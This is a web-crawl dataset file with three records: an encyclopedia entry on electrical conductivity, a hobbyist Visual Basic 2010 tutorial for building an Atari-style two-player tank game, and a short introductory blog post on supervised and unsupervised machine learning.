URL: stringlengths 15 to 1.68k
text_list: listlengths 1 to 199
image_list: listlengths 1 to 199
metadata: stringlengths 1.19k to 3.08k
https://en.academic.ru/dic.nsf/enwiki/37410
[ "# Electrical conductivity\n\n\nElectrical conductivity\n\nElectrical conductivity or specific conductivity is a measure of a material's ability to conduct an electric current. When an electrical potential difference is placed across a conductor, its movable charges flow, giving rise to an electric current. The conductivity σ is defined as the ratio of the current density $mathbf\\left\\{J\\right\\}$ to the electric field strength $mathbf\\left\\{E\\right\\}$:\n\n:$mathbf\\left\\{J\\right\\} = sigma mathbf\\left\\{E\\right\\}$\n\nIt is also possible to have materials in which the conductivity is anisotropic, in which case σ is a 3×3 matrix (or more technically a rank-2 tensor) which is generally symmetric.\n\nConductivity is the reciprocal (inverse) of electrical resistivity and has the SI units of siemens per metre (S·m-1) i.e. if the electrical conductance between opposite faces of a 1-metre cube of material is 1 Siemens then the material's electrical conductivity is 1 Siemens per metre. Electrical conductivity is commonly represented by the Greek letter σ, but κ or γ are also occasionally used.\n\nAn EC meter is normally used to measure conductivity in a solution.\n\nClassification of materials by conductivity\n\n* A conductor such as a metal has high conductivity and a low resistance.\n* An insulator like glass or a vacuum has low conductivity.\n* The conductivity of a semiconductor is generally intermediate, but varies widely under different conditions, such as exposure of the material to electric fields or specific frequencies of light, and, most important, with temperature and composition of the semiconductor material.\n\nThe degree of doping in solid state semiconductors makes a large difference in conductivity. More doping leads to higher conductivity. The conductivity of a solution of water is highly dependent on its concentration of dissolved salts and sometimes other chemical species which tend to ionize in the solution. Electrical conductivity of water samples is used as an indicator of how salt-free or impurity-free the sample is; the purer the water, the lower the conductivity or higher.\n\nome electrical conductivities\n\nComplex conductivity\n\nTo analyse the conductivity of materials exposed to alternating electric fields, it is necessary to treat conductivity as a complex number (or as a matrix of complex numbers, in the case of anisotropic materials mentioned above) called the \"admittivity\". This method is used in applications such as electrical impedance tomography, a type of industrial and medical imaging. Admittivity is the sum of a real component called the conductivity and an imaginary component called the susceptivity. [http://www.otto-schmitt.org/OttoPagesFinalForm/Sounds/Speeches/MutualImpedivity.htm]\n\nAn alternative description of the response to alternating currents uses a real (but frequency-dependent) conductivity, along with a real permittivity. The larger the conductivity is, the more quickly the alternating-current signal is absorbed by the material (i.e., the more opaque the material is). For details, see Mathematical descriptions of opacity.\n\nTemperature dependence\n\nElectrical conductivity is strongly dependent on temperature. In metals, electrical conductivity decreases with increasing temperature, whereas in semiconductors, electrical conductivity increases with increasing temperature. Over a limited temperature range, the electrical conductivity can be approximated as being directly proportional to temperature. 
In order to compare electrical conductivity measurements made at different temperatures, they need to be standardized to a common temperature. This dependence is often expressed as a slope in the conductivity-versus-temperature graph and can be written as:\n\n:$\sigma_{T'} = \frac{\sigma_T}{1 + \alpha (T - T')}$\n\nwhere\n\n:\"σT′\" is the electrical conductivity at the common temperature \"T′\",\n:\"σT\" is the electrical conductivity at the measured temperature \"T\",\n:\"α\" is the temperature compensation slope of the material,\n:\"T\" is the measured absolute temperature,\n:\"T′\" is the common temperature.\n\nThe temperature compensation slope for most naturally occurring waters is about 2 %/°C; however, it can range from 1 to 3 %/°C. This slope is influenced by the geochemistry and can easily be determined in a laboratory.\n\nAt extremely low temperatures (not far above absolute zero, 0 K), a few materials have been found to exhibit very high electrical conductivity in a phenomenon called superconductivity.\n\nReferences\n\nSee also\n\n*Classical and quantum conductivity\n*Electrical conduction for a discussion of the physical origin of electrical conductivity.\n*Electrical resistance\n*Electrical resistivity is the inverse of electrical conductivity\n*Molar conductivity for a discussion of electrolytic conductivity, i.e. conductivity due to ions in solution\n*SI electromagnetism units\n*Transport phenomena\n* Thermal conductivity\n\n* [http://glassproperties.com/resistivity/ElectrResistMeasurement.htm Measurement of the Electrical Conductivity of Glass Melts] Measurement techniques, definitions, and electrical conductivity calculation from the glass composition\n* [http://environmentalchemistry.com/yogi/periodic/electrical.html Periodic Table of Elements Sorted by Electrical Conductivity]\n\nWikimedia Foundation. 2010.\n\n### Look at other dictionaries:\n\n• electrical conductivity — savitasis laidis statusas T sritis automatika atitikmenys: angl. conductivity; electrical conductivity; specific conductivity vok. spezifischer Leitwert, m rus. удельная проводимость, f; удельная электропроводность, f pranc. conductibilité… …   Automatikos terminų žodynas\n\n• electrical conductivity — savitasis elektrinis laidis statusas T sritis chemija apibrėžtis Dydis, atvirkščiai proporcingas savitajai varžai (S/m). atitikmenys: angl. electric conductivity; electrical conductivity rus. удельная электропроводность …   Chemijos terminų aiškinamasis žodynas\n\n• electrical conductivity — savitasis elektrinis laidis statusas T sritis fizika atitikmenys: angl. electric conductivity; electrical conductivity vok. spezifische Leitfähigkeit, f; spezifischer Leitwert, m rus. удельная электропроводность, f pranc. conductivité électrique …   Fizikos terminų žodynas\n\n• Electrical conductivity — Электрическая проводимость …   Краткий толковый словарь по полиграфии\n\n• electrical conductivity — Смотри Электропроводность …   Энциклопедический словарь по металлургии\n\n• electrical conductivity — the proportionality constant between current density and applied electric field; a measure of the ease with which a material is capable of conducting an electric current …   Mechanics glossary\n\n• electrical conductivity — The ability of a material to conduct electricity. The opposite is resistivity or resistance …   Dictionary of automotive terms\n\n• Electrical conductivity meter — An electrical conductivity meter. 
An electrical conductivity meter (EC meter) measures the electrical conductivity in a solution. Commonly used in hydroponics, aquaculture and freshwater systems to monitor the amount of nutrients, salts or… …   Wikipedia\n\n• Electrical impedance tomography — (EIT), is a medical imaging technique in which an image of the conductivity or permittivity of part of the body is inferred from surface electrical measurements. Typically conducting electrodes are attached to the skin of the subject and small… …   Wikipedia\n\n• Electrical conduction — is the movement of electrically charged particles through a transmission medium (electrical conductor). The movement of charge constitutes an electric current. The charge transport may result as a response to an electric field, or as a result of… …   Wikipedia" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7896425,"math_prob":0.971557,"size":7370,"snap":"2019-43-2019-47","text_gpt3_token_len":1573,"char_repetition_ratio":0.23730655,"word_repetition_ratio":0.022132797,"special_character_ratio":0.17123474,"punctuation_ratio":0.11219081,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96673876,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T12:27:04Z\",\"WARC-Record-ID\":\"<urn:uuid:e328a88e-ac1e-4cd2-80e9-2e2ada1dbc5c>\",\"Content-Length\":\"48811\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9df2a21b-f622-484b-9bf3-ce02119826c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:796c6fad-028a-4955-9bf7-04f32a1a4bd2>\",\"WARC-IP-Address\":\"95.217.42.33\",\"WARC-Target-URI\":\"https://en.academic.ru/dic.nsf/enwiki/37410\",\"WARC-Payload-Digest\":\"sha1:25FQ6BOV6NPND2Q6EU3JR6NKXWXLCP74\",\"WARC-Block-Digest\":\"sha1:QB2EH5BFLTN2W3V5WW6HJSIFXFE3U754\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670558.91_warc_CC-MAIN-20191120111249-20191120135249-00305.warc.gz\"}"}
https://www.instructables.com/Atari-Combat-Tank-vb-2010/
[ "## Introduction: Atari Combat: Tank Vb 2010\n\nThis is my first instructable so bear with me... for my vb final i decided to program atari combat tank everything worked out other than when i hit a barricade the tanks r unable to move...\n\n## Step 1: Open VB2010\n\nOpen Visual Basic 2010 and select new project name the project anything you want i just kept mine as windowsapplication1 make sure Windows Forms Application is selected and click OK\n\n## Step 2: Designing the Form\n\non form 1 you will need a button.... on my form i added 3 labels and 2 pictureboxes\n\n## Step 3: Form 1 Code\n\ndouble click the button to show the code and add the following:\n\nTank_VS_Tank.Show()\n\n## Step 4: Adding Form 2\n\nto add a new form go to the menu strip item \"project\" and select \"Add Windows Form\" and select \"Windows Form\" name it what you want and click \"add\"\n\n## Step 5: Form 2 Design\n\nadd 16 timers 2 labels and 11 pictureboxes\n\nplace 9 pictureboxes at the bottom of the form and place one picturebox at the middle left and middle right of the form\n\nplace the labels at the top left and top right of the form\n\n## Step 6: Form 2 Propertys\n\nselect form 2 and click the property's toolbar on the right side of the form.\n\nselect backcolor and change it to 0, 64, 0 or a dark green\n\nchange forecolor to transparent\n\nchange formborderstyle to fixedtoolwindow\n\nchange start position to center screen\n\nand window state to maximized\n\n## Step 7: Label Property's\n\nselect the label on the left side and change the following:\n\nbackcolor: transparent\n\nborderstyle: none\n\nfont: IMPACT, 24pt\n\nforecolor: red\n\ntext: 0\n\nname: rs\n\nlocation: 7, 14\n\nautosize: false\n\nsize: 57,57\n\ndo the same for the label on the right but change the color to blue and name to bs\n\n## Step 8: Picturebox Property's\n\nchange the property's for the the picturebox on the left:\n\nbackcolor: backcolor of form2\n\nimage: download the red tank in the picture above... and that will be the red tank\n\nname: tank1\n\nlocation: 16, 517\n\nsize: 30,30\n\nchange the picturebox property's on the right to the same as on the left except the following:\n\nimage download the blue tank in the picture above... 
that will be the blue tank\n\nlocation: 1644, 517\n\nname: tank2\n\nfor the first four pictureboxes at the bottom of the form change the following:\n\nname: name them as the notes in the pictures above\n\n## Step 9: The Code: Dimensions\n\njust under public class add this code ,,, these are the variables we will use later in the code\n\n'we will use k to tell us the direction the tank2 is facing\n\nDim k As Integer = 4 'tank2 side counter\n\n'we will use s to tell us the direction of tank1\n\nDim s As Integer = 3 'tank1 side counter\n\n'b(17) is an object array there is not much online about object arrays so if i get enough attention i might make an 'instructable on it\n\nDim b(17) As PictureBox 'picturebox array\n\n'bt/rt is used to detect if both tank hit the border\n\nDim bt As Boolean = False\n\nDim rt As Boolean = False\n\n## Step 10: The Code:tank_vs_tank_keyup\n\nkey up is a handler that detects when a key is let up\n\ndouble click form2 and select the declaration toolbar at the top of the code and select keyup\nadd the following code after the dimensions:\n\nSelect Case e.KeyCode\nCase Is = Keys.W\n\nTimer9.Enabled = False 'stops tank move when w key up\n\nCase Is = Keys.S\n\nTimer10.Enabled = False 'stops tank move when s key up\n\nCase Is = Keys.D\n\nTimer11.Enabled = False 'stops tank move when d key up\n\nCase Is = Keys.A\n\nTimer12.Enabled = False 'stops tank move when a key up\n\nCase Is = Keys.ControlKey 'shoots\n\nIf s = 1 Then Timer1.Enabled = True 'detects if tank1 face right\n\nIf s = 2 Then Timer2.Enabled = True 'detects if tank1 face left\n\nIf s = 3 Then Timer3.Enabled = True 'detects if tank1 face up\n\nIf s = 4 Then Timer4.Enabled = True 'detects if tank1 face down\n\nEnd Select\n\n'left tank\n\nSelect Case e.KeyCode\n\nCase Is = Keys.Up\n\nTimer13.Enabled = False 'stops tank move when up key up\n\nCase Is = Keys.Down\n\nTimer14.Enabled = False 'stops tank move when down key up\n\nCase Is = Keys.Left\n\nTimer15.Enabled = False 'stops tank move when left key up\n\nCase Is = Keys.Right\n\nTimer16.Enabled = False 'stops tank move when right key up\n\nCase Is = Keys.Enter 'shoots\n\nIf k = 1 Then Timer5.Enabled = True 'detects if tank2 face right\n\nIf k = 2 Then Timer6.Enabled = True 'detects if tank2 face left\n\nIf k = 3 Then Timer7.Enabled = True 'detects if tank2 face up\n\nIf k = 4 Then Timer8.Enabled = True 'detects if tank1 face down\n\nEnd Select\n\n## Step 11: The Code: Object Array\n\nthe following is code for 17 pictureboxes... 
these will act as our blocks the code will go after the private sub statment\n\n\"Private Sub Tank_VS_Tank_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load\"\n\nFor i = 1 To 17\n\nb(i) = New PictureBox 'adds new picbox\n\nb(i).Visible = True 'makes block visible\n\nb(i).BackColor = Color.Khaki 'makes color of blocker khaki\n\nNext\n\nWith b(1) 'size and place block 1\n\n.Height = 22\n\n.Width = 100\n\n.Left = 81\n\n.Top = 138\n\nEnd With\n\nWith b(2) 'size and place block 2\n\n.Height = 200\n\n.Width = 22\n\n.Left = 159\n\n.Top = 159\n\nEnd With\n\nWith b(3) 'size and place block 3\n\n.Height = 200\n\n.Width = 22\n\n.Top = 350\n\n.Left = 159\n\nEnd With\n\nWith b(4) 'size and place block 4\n\n.Height = 22\n\n.Width = 100\n\n.Left = 81\n\n.Top = 550\n\nEnd With\n\nWith b(5) 'size and place block 5\n\n.Height = 22\n\n.Width = 100\n\n.Left = 404\n\n.Top = 0\n\nEnd With\n\nWith b(6) 'size and place block 6\n\n.Height = 200\n\n.Width = 22\n\n.Left = 443\n\n.Top = 22\n\nEnd With\n\nWith b(7) 'size and place block 7\n\n.Height = 200\n\n.Width = 23\n\n.Left = 443\n\n.Top = 484\n\nEnd With\n\nWith b(8) 'size and place block 8\n\n.Height = 22\n\n.Width = 100\n\n.Top = 680\n\n.Left = 404\n\nEnd With\n\nWith b(9) 'size and place block 9\n\n.Height = 200\n\n.Width = 22\n\n.Left = 631\n\n.Top = 253\n\nEnd With\n\nWith b(10) 'size and place block 10\n\n.Height = 22\n\n.Width = 100\n\n.Left = 802\n\n.Top = 0\n\nEnd With\n\nWith b(11) 'size and place block 11\n\n.Height = 200\n\n.Width = 22\n\n.Left = 841\n\n.Top = 22\n\nEnd With\n\nWith b(12) 'size and place block 12\n\n.Height = 200\n\n.Width = 22\n\n.Left = 841\n\n.Top = 484\n\nEnd With\n\nWith b(13) 'size and place block 13\n\n.Height = 22\n\n.Width = 100\n\n.Left = 802\n\n.Top = 680\n\nEnd With\n\nWith b(14) 'size and place block 14\n\n.Height = 22\n\n.Width = 100\n\n.Left = 1125\n\n.Top = 137\n\nEnd With\n\nWith b(15) 'size and place block 15\n\n.Height = 200\n\n.Width = 22\n\n.Left = 1125\n\n.Top = 159\n\nEnd With\n\nWith b(16) 'size and place block 16\n\n.Height = 200\n\n.Width = 22\n\n.Left = 1125\n\n.Top = 350\n\nEnd With\n\nWith b(17) 'size and place block 17\n\n.Height = 22\n\n.Width = 100\n\n.Left = 1125\n\n.Top = 550\n\nEnd With\n\nEnd Sub\n\n## Step 12: The Code: Keydown\n\nkey down detects if a key is down the code goes after private sub tank_vs_tank_keydown\n\nselect the declarations for the form 1 code and select keydown\n\nPrivate Sub Tank_VS_Tank_KeyDown(ByVal sender As Object, ByVal e As System.Windows.Forms.KeyEventArgs) Handles Me.KeyDow\n\n'right tank\n\nSelect Case e.KeyCode\n\nCase Is = Keys.W 'moves tank1 up and changes the counter to 3 and the image to tank face up\n\nIf tank1.Top = Me.Top Then Timer9.Enabled = False\n\ns = 3\n\nTimer9.Enabled = True\n\nTimer10.Enabled = False\n\nTimer11.Enabled = False\n\nTimer12.Enabled = False\n\ntank1.Image = rt1.Image\n\nCase Is = Keys.S 'moves tank1 down and changes the counter to 4 and the image to tank face down\n\nIf tank1.Bottom = Me.Bottom Then Timer10.Enabled = False\n\ns = 4\n\nTimer10.Enabled = True\n\nTimer9.Enabled = False\n\nTimer11.Enabled = False\n\nTimer12.Enabled = False\n\ntank1.Image = rt3.Image\n\nCase Is = Keys.D 'moves tank1 right and changes the counter to 1 and the image to tank face right\n\nIf tank1.Right = Me.Right Then Timer11.Enabled = False\n\ns = 1\n\nTimer11.Enabled = True\n\nTimer9.Enabled = False\n\nTimer10.Enabled = False\n\nTimer12.Enabled = False\n\ntank1.Image = rt4.Image\n\nCase Is = Keys.A 'moves tank1 left and 
changes the counter to 2 and the image to tank face left\n\nIf tank1.Left = Me.Left Then Timer12.Enabled = False\n\ns = 2\n\nTimer12.Enabled = True\n\nTimer9.Enabled = False\n\nTimer10.Enabled = False\n\nTimer11.Enabled = False\n\ntank1.Image = rt2.Image\n\nCase Is = Keys.P\n\nMsgBox(\"Paused Press OK to Continue\")\n\nEnd Select\n\nramo.Left = tank1.Left + 15\n\nramo.Top = tank1.Top + 13\n\nFor re = 1 To 17\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer9.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer10.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer11.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then Timer12.Enabled = False\n\nIf tank1.Bounds.IntersectsWith(b(re).Bounds) Then rt = True\n\nNext\n\nIf tank1.Top < Me.Top + 15 Then tank1.Top += 6\n\nIf tank1.Bottom > Me.Bottom - 35 Then tank1.Top -= 6\n\nIf tank1.Right > Me.Right - 15 Then tank1.Left -= 6\n\nIf tank1.Left < Me.Left + 10 Then tank1.Left += 6\n\n'left tank\n\nSelect Case e.KeyCode\n\nCase Is = Keys.Up 'moves tank2 up and changes the counter to 4 and the image to tank face up\n\nk = 4\n\nTimer13.Enabled = True\n\nTimer14.Enabled = False\n\nTimer15.Enabled = False\n\nTimer16.Enabled = False\n\ntank2.Image = bt1.Image\n\nCase Is = Keys.Down 'moves tank2 down and changes the counter to 3 and the image to tank face down\n\nk = 3\n\nTimer14.Enabled = True\n\nTimer15.Enabled = False\n\nTimer16.Enabled = False\n\nTimer13.Enabled = False\n\ntank2.Image = bt3.Image\n\nCase Is = Keys.Left 'moves tank2 right and changes the counter to 1 and the image to tank face right\n\nk = 1\n\nTimer15.Enabled = True\n\nTimer16.Enabled = False\n\nTimer13.Enabled = False\n\nTimer14.Enabled = False\n\ntank2.Image = bt2.Image\n\nCase Is = Keys.Right 'moves tank2 left and changes the counter to 2 and the image to tank face left\n\nk = 2\n\nTimer16.Enabled = True\n\nTimer13.Enabled = False\n\nTimer14.Enabled = False\n\nTimer15.Enabled = False\n\ntank2.Image = bt4.Image\n\nEnd Select\n\nbamo.Left = tank2.Left + 15 'places blue ammo\n\nbamo.Top = tank2.Top + 13\n\nFor ree = 1 To 17\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer13.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer14.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer15.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then Timer16.Enabled = False 'checks if tank2 hits blocks\n\nIf tank2.Bounds.IntersectsWith(b(ree).Bounds) Then bt = True\n\nNext\n\nIf rt = True And bt = True Then reset()\n\nIf tank2.Top < Me.Top + 15 Then tank2.Top += 5\n\nIf tank2.Bottom > Me.Bottom + 35 Then tank2.Top -= 5\n\nIf tank2.Right > Me.Right - 15 Then tank2.Left -= 5\n\nIf tank2.Left < Me.Left + 5 Then tank2.Left += 5\n\nEnd Sub\n\n## Step 13: The Code: Red Bullet\n\ngo to the form2 design page and select timers 1 to 4 and press enter\n\nPrivate Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick 'fires red ammo right\n\nramo.Left += 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer1.Enabled = False\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then reset()\n\nt()\n\nIf ramo.Right > Me.Right Then Timer1.Enabled = False\n\nFor rer = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(rer).Bounds) Then Timer1.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As 
System.EventArgs) Handles Timer2.Tick 'fires red ammo left\n\nramo.Left -= 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer2.Enabled = False\n\nt()\n\nIf ramo.Left < Me.Left Then Timer2.Enabled = False\n\nFor rere = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(rere).Bounds) Then Timer2.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick 'fires red ammo up\n\nramo.Top -= 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer3.Enabled = False\n\nt()\n\nIf ramo.Top < Me.Top Then Timer3.Enabled = False\n\nFor rerer = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(rerer).Bounds) Then Timer3.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer4_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer4.Tick 'fires red ammo down\n\nramo.Top += 10\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then Timer4.Enabled = False\n\nt()\n\nIf ramo.Bottom > Me.Bottom Then Timer4.Enabled = False\n\nFor ri = 1 To 17\n\nIf ramo.Bounds.IntersectsWith(b(ri).Bounds) Then Timer4.Enabled = False\n\nNext\n\nEnd Sub\n\n## Step 14: The Code: Blue Bullet\n\nselect timers 5 to 8 and press enter\n\nPrivate Sub Timer5_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer5.Tick 'fires blue ammo left\n\nbamo.Left -= 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer5.Enabled = False\n\nt2()\n\nIf bamo.Left < Me.Left Then Timer5.Enabled = False\n\nFor rir = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(rir).Bounds) Then Timer5.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer6_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer6.Tick 'fires blue ammo right\n\nbamo.Left += 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer6.Enabled = False\n\nt2()\n\nIf bamo.Right > Me.Right Then Timer6.Enabled = False\n\nFor riri = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(riri).Bounds) Then Timer6.Enabled = False\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer7_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer7.Tick 'fires blue ammo down\n\nbamo.Top += 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer7.Enabled = False 'stops timer\n\nt2()\n\nIf bamo.Bottom > Me.Bottom Then Timer7.Enabled = False 'if bamo is > form2 bottom ammo\n\nFor ririr = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(ririr).Bounds) Then Timer7.Enabled = False 'detects if bamo hits blocks\n\nNext\n\nEnd Sub\n\nPrivate Sub Timer8_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer8.Tick 'fires blue ammo up\n\nbamo.Top -= 10\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then Timer8.Enabled = False 'stops timer\n\nt2()\n\nIf bamo.Top < Me.Top Then Timer8.Enabled = False 'if bamo is < form2 top ammo\n\nFor ririri = 1 To 17\n\nIf bamo.Bounds.IntersectsWith(b(ririri).Bounds) Then Timer8.Enabled = False 'detects if bamo hits blocks\n\nNext\n\nEnd Sub\n\n## Step 15: The Code: Red Tank Movement\n\nto move the red tank i use 4 timers each for either up down left or right in form2 design select timers 9-12 and press enter add the following code to each:\n\nPrivate Sub Timer9_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer9.Tick 'up\ntank1.Top -= 5\n\ntank1.Image = rt1.Image\n\nEnd Sub\n\nPrivate Sub Timer10_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer10.Tick 'down\ntank1.Top += 5\n\ntank1.Image = rt3.Image\n\nEnd Sub\n\nPrivate Sub Timer11_Tick(ByVal sender As 
System.Object, ByVal e As System.EventArgs) Handles Timer11.Tick 'right (D key)\n\ntank1.Left += 5\n\ntank1.Image = rt4.Image\n\nEnd Sub\n\nPrivate Sub Timer12_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer12.Tick 'left (A key)\n\ntank1.Left -= 5\n\ntank1.Image = rt2.Image\n\nEnd Sub\n\n## Step 16: The Code: Blue Tank Movement\n\nFor the blue tank I did the same, except with different timers, so in the Form2 design select timers 13-16, press Enter and add the following code to each:\n\nPrivate Sub Timer13_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer13.Tick 'up\ntank2.Top -= 5\n\ntank2.Image = bt1.Image\n\nEnd Sub\n\nPrivate Sub Timer14_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer14.Tick\n\n'down\n\ntank2.Top += 5\n\ntank2.Image = bt3.Image\n\nEnd Sub\n\nPrivate Sub Timer15_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer15.Tick 'left\n\ntank2.Left -= 5\n\ntank2.Image = bt2.Image\n\nEnd Sub\n\nPrivate Sub Timer16_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer16.Tick 'right\n\ntank2.Left += 5\n\ntank2.Image = bt4.Image\n\nEnd Sub\n\n## Step 17: The Code: Subroutines\n\nIn my code I had calls like t(), t2() and reset(); those are my subroutines. t() detects if the red ammo hits the form borders or the blue tank; t2() detects if the blue ammo hits the red tank or the form; and reset() resets the game field.\n\nHere's the code for t():\n\nPrivate Sub t()\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then tank2.Image = extank.Image\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then tank1.Left = 12\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then tank1.Top = 336\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then tank2.Left = 1233\n\nIf ramo.Bounds.IntersectsWith(tank2.Bounds) Then tank2.Top = 336\n\nEnd Sub\n\nThe code for t2():\n\nPrivate Sub t2()\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then tank1.Image = extank.Image\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then tank2.Left = 1233\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then tank2.Top = 336\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then tank1.Left = 12\n\nIf bamo.Bounds.IntersectsWith(tank1.Bounds) Then tank1.Top = 336\n\nEnd Sub\n\nThe code for reset():\n\nPrivate Sub reset()\n\ntank1.Left = 12\n\ntank1.Top = 336\n\ntank2.Left = 1233\n\ntank2.Top = 336\n\nbt = False\n\nrt = False\n\nEnd Sub\n\n## Step 18: The End\n\nThanks for looking at my instructable, please give feedback", null, "Participated in the\nGame.Life 4 Contest", null, "Participated in the\nMakerlympics Contest" ]
[ null, "https://www.instructables.com/assets/img/pixel.png", null, "https://www.instructables.com/assets/img/pixel.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61101913,"math_prob":0.9799904,"size":17120,"snap":"2023-40-2023-50","text_gpt3_token_len":4898,"char_repetition_ratio":0.21295863,"word_repetition_ratio":0.17411348,"special_character_ratio":0.2879673,"punctuation_ratio":0.16251384,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9815528,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T10:04:07Z\",\"WARC-Record-ID\":\"<urn:uuid:3739231c-421b-452f-b450-d44ffd73c815>\",\"Content-Length\":\"133381\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e361fd7c-da87-4bf4-92e0-20ab8e7745a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:b01c570c-0630-4fd4-b02d-cb94bd1956ee>\",\"WARC-IP-Address\":\"146.75.29.105\",\"WARC-Target-URI\":\"https://www.instructables.com/Atari-Combat-Tank-vb-2010/\",\"WARC-Payload-Digest\":\"sha1:2WDYUV4X43IHESNU6PDZJOJS4TOQUP4I\",\"WARC-Block-Digest\":\"sha1:OF5H5RCQNTORT243CZ3XHBYUC2UTSVJC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679103810.88_warc_CC-MAIN-20231211080606-20231211110606-00415.warc.gz\"}"}
http://www.develbyte.in/machine-learning/what-is-machine-learning/
[ "# What is Machine Learning?\n\nMachine learning is a field of study that provides computers with the ability to learn without being explicitly programmed - Arthur Samuel.\n\nMachine learning is a part of computer science which focuses on the development of computer programs that can teach themselves to grow and change based on the data it is exposed to.\n\nMachine learning algorithms are used heavily in mining large data sets like click stream data, flight data, engineering data, sensor data etc. Machine learning programs detect patterns in data and adjust program actions accordingly. For example, Facebook’s News Feed changes according to the user’s personal interactions with other users. If a user frequently tags a friend in photos, writes on his wall or “likes” his links, the News Feed will show more of that friend’s activity in the user’s News Feed due to presumed closeness.\n\nMachine learning algorithms plays  a big role solving complex problems which cannot be programmed like flying an Aircraft, DNA sequencing, Genome Analysis.\n\nThe machine learning algorithms can be classified into two main categories:\n\n• Supervised Learning Algorithms\n• Unsupervised Learning Algorithms\n\n### Supervised learning algorithms\n\nThe majority of practical machine learning uses supervised learning. In a supervised machine learning algorithm we start with a data set which contains both the inputs and the corresponding correct answer and we train the algorithm to learn a function good enough to predict the correct or approximate correct output for a new given input value which it have not seen before.\n\nThe supervised learning algorithms can be further grouped under Regression and Classification problems.\n\nRegression All the algorithms used to predict a continuous number as output for a given input, then its a Regression algorithm.\n\ne.g: if we are trying to predict the price of a house, based on history of real state transaction data its a Regression problem since the price is continuous number.\n\nClassification All the algorithms where we try to predict a the group in which a given input falls in is a Classification problem.\n\ne.g. if we are trying to predict if the given email is spam or not, its a classification problem, since there the two groups span and not-spam and we are trying to put the given input in one of there,  the number of groups can be two or more then two. let take another example let say given a bunch of images we want to predict of there is a cat, dog, horse or a tiger\n\n### Unsupervised  learning algorithms\n\nIn this type of learning algorithms we use to only have input data, the corresponding output is unknown and the algorithms are left to their own to discover and present the interesting structure in the data, The goal for unsupervised learning is to model the underlying structure" ]
[ null ]
